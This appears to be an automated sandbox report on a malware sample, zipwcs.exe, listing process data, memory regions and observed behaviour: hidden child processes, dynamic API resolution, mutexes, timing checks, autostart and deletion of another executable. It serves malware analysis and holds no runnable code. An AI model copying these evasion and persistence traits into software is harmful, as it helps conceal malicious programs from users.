| Command Line | "C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:56, Reason: Child Process |
| Unmonitor | End Time: 00:01:57, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x514 |
| Parent PID | 0x584 (c:\users\aetadzjz\appdata\local\zipwcs\ushher04ro2oqyuqi7w.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
794
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001b8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001d9fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00289fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002affff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| zipwcs.exe2oqyuqi7w.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00430000 | 0x00496fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00627fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00800fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x01c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c10000 | 0x01c10000 | 0x01c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01e3ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01e40000 | 0x0210efff | Memory Mapped File | r |
|
|
|
- |
| wow64win.dll | 0x75020000 | 0x7507bfff | Memory Mapped File | rwx |
|
|
|
- |
| pdh.dll | 0x750f0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe | os_pid = 0x354, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE |
|
1 |
Module (16)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76540000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fda8 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fdb8 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76551700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76551809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765517ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7656eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765511c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76555929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765511f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x765f6aa8 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
1 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEM584 |
|
1 | |
| Create | mutex_name = PEM514 |
|
1 |
Process #13: zipwcs.exe
70
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:56, Reason: Child Process |
| Unmonitor | End Time: 00:02:13, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x354 |
| Parent PID | 0x514 (c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
418
0x
330
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002a8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002d9fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002f9fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0031ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00327fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00320fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b7fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| zipwcs.exe2oqyuqi7w.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00840fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x01c4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c50000 | 0x01c50000 | 0x01d4ffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x01c50000 | 0x01c8bfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01dc0000 | 0x0208efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002090000 | 0x02090000 | 0x0216efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x0226ffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x74e40000 | 0x74e7afff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74fa0000 | 0x7501ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x75020000 | 0x7507bfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x750b0000 | 0x750c5fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x750d0000 | 0x750e6fff | Memory Mapped File | rwx |
|
|
|
- |
| pdh.dll | 0x750f0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75280000 | 0x7528afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x75290000 | 0x752a2fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752d0000 | 0x752d7fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x752f0000 | 0x752fcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75740000 | 0x75875fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x759e0000 | 0x759ebfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x75a10000 | 0x75b04fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x75f10000 | 0x7610afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76650000 | 0x7676cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Delete | C:\Users\aETAdzjz\AppData\Local\mddefwmerged\mddefwmerged.exe | - |
|
1 |
Module (26)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76540000 |
|
1 | |
| Load | user32.dll | base_address = 0x76380000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x75390000 |
|
1 | |
| Load | shell32.dll | base_address = 0x76770000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x76650000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x75740000 |
|
1 | |
| Load | userenv.dll | base_address = 0x750d0000 |
|
1 | |
| Load | wininet.dll | base_address = 0x75a10000 |
|
1 | |
| Load | wtsapi32.dll | base_address = 0x752f0000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe2oqyuqi7w.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fda8 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fdb8 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fd68 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76551700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76551809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765517ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7656eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765511c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76555929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765511f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x765f6aa8 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
Keyboard (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 772, result_out = 0 |
|
11 |
System (25)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 167264 |
|
2 | |
| Get Time | type = Ticks, time = 168278 |
|
1 | |
| Get Time | type = Ticks, time = 169292 |
|
1 | |
| Get Time | type = Ticks, time = 170306 |
|
1 | |
| Get Time | type = Ticks, time = 171320 |
|
1 | |
| Get Time | type = Ticks, time = 172334 |
|
1 | |
| Get Time | type = Ticks, time = 173348 |
|
1 | |
| Get Time | type = Ticks, time = 173379 |
|
2 | |
| Get Time | type = Ticks, time = 174362 |
|
1 | |
| Get Time | type = Ticks, time = 175376 |
|
1 | |
| Get Time | type = Ticks, time = 176390 |
|
1 | |
| Get Time | type = Ticks, time = 177404 |
|
1 | |
| Get Time | type = Ticks, time = 178418 |
|
1 | |
| Get Time | type = Ticks, time = 179432 |
|
1 | |
| Get Time | type = Ticks, time = 179479 |
|
2 | |
| Get Time | type = Ticks, time = 180446 |
|
1 | |
| Get Time | type = Ticks, time = 181460 |
|
1 | |
| Get Time | type = Ticks, time = 182474 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
Mutex (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEM514 |
|
1 | |
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
Process #16: zipwcs.exe
31
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\users\aetadzjz\appdata\local\zipwcs\zipwcs.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\zipwcs\zipwcs.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:38, Reason: Autostart |
| Unmonitor | End Time: 00:02:47, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x53c |
| Parent PID | 0x45c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
540
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002a8fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00359fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x00379fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0039ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| zipwcs.exe | 0x00400000 | 0x00424fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000550000 | 0x00550000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00907fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x00a90fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000aa0000 | 0x00aa0000 | 0x01e9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ff0000 | 0x01ff0000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02030000 | 0x022fefff | Memory Mapped File | r |
|
|
|
- |
| pdh.dll | 0x73420000 | 0x7345bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x73600000 | 0x73607fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73610000 | 0x7366bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73670000 | 0x736aefff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a20000 | 0x74a2bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74a30000 | 0x74a8ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74e30000 | 0x74f1ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x74f20000 | 0x74fcbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x750b0000 | 0x751bffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x751c0000 | 0x7528bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x76480000 | 0x764dffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x764f0000 | 0x76535fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76540000 | 0x765dffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x767f0000 | 0x767f9fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76800000 | 0x76818fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x769e0000 | 0x76a7cfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000076ad0000 | 0x76ad0000 | 0x76bc9fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000076bd0000 | 0x76bd0000 | 0x76ceefff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x76cf0000 | 0x76e98fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x76ed0000 | 0x7704ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
